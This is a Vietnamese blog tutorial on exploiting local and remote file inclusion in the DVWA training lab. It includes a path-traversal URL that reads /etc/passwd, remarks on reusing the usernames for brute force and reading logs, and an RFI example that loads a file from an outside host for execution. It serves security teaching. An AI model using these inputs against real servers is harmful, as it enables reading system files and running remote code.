Trong phần khai thác lỗ hổng file inclusion chúng ta sẽ có 2 phần: Local File Inclusion và Remote File Inclusion. Nhưng trước tiên, chúng ta hay kiểm tra trang DVWA cho phần file inclusion như thê nào.
Xem thêm https://thudinh.blogspot.com/2017/09/hieu-ve-tan-cong-khai-thac-lo-hong-file.html để rõ hơn về File Inclusion
Link chúng ta thấy trên browser sẽ là
http://dvwa_lab.com/dvwa/vulnerabilities/fi/?page=include.php
? là dấu hiệu bắt đầu các tham số được sắp xếp
= chỉ ra rằng tham sô được gán với 1 giá trị
Bây giờ chúng ta click lần lượt vào từng [file1.php][file2.php][file3.php] sau đó quan sát thay đổi.
http://...page=file1.php ; page=file2.php ; page=file3.php
Như chúng ta thấy, tham sô trang lấy 2 tên tập tin khác nhau theo giá trị file nhận được. Các tập tin đều nằm trong http://dvwa_lab.com/dvwa/vulnerabilities/fi/ thư mục của trang hiện tại được include trong include.php. Cơ chế này gọi là file inclusion.
Tấn công LFI
Thư mục hiện hành lưu trữ trên server web DVWA là /var/www/html/dvwa/vulnerabilities/fi/
Giờ tôi muốn truy cập tập tin passwd trong thư mục /etc thì làm thế nào. Hãy nhìn vào cây thư mục của Linux để có thể hiểu rõ hơn.
Như bạn thấy thư mục etc nằm trong trong / . Vì vậy muốn tới được thư mục này chúng ta phải đến thư mục cha, trong khi chúng ta đang ở thư mục này /var/www/html/dvwa/vulnerabilities/fi/
Chúng ta đi tới thư mục cha như sau:
fi ../
vulnerabilities ../
dvwa ../
html ../
www ../
var ../
Vậy chúng ta sử dụng 6 lệnh ../ thì chúng ta sẽ đi đến được thư mục / (thư mục root)
Chúng ta bây giờ truy cập thông tin passwd sẽ là
../../../../../../etc/passwd
và đường link sẽ là : http://dvwa_lab.com/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
Vậy là chúng ta đã tấn công Local File Inclusion(LFI). Thông tin lấy được username chúng ta có thể phục vụ cho tấn công Brute Force chẳng hạn.
Hoặc chúng ta có thể lấy bất cứ thông tin nào khác như access.log, error.log ...
Tấn công Remote File Inclusion (RFI)
Về hinh
Chúng ta sẽ sử dụng tập tin từ 1 máy chủ bên ngoài đưa vào thực thi.
Giả sử tập tin sau: file.html
Ở đây chúng ta sử dụng tham số như sau:
http://dvwa_lab.com/dvwa/vulnerabilities/fi/?page=http://
ví dụ: http://thudv.com:8000/file.html tham số trang là 1 liên kết ngoài trong khi LFI đang lấy thông tin tập tin chứa trên máy chủ web.
Pages
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment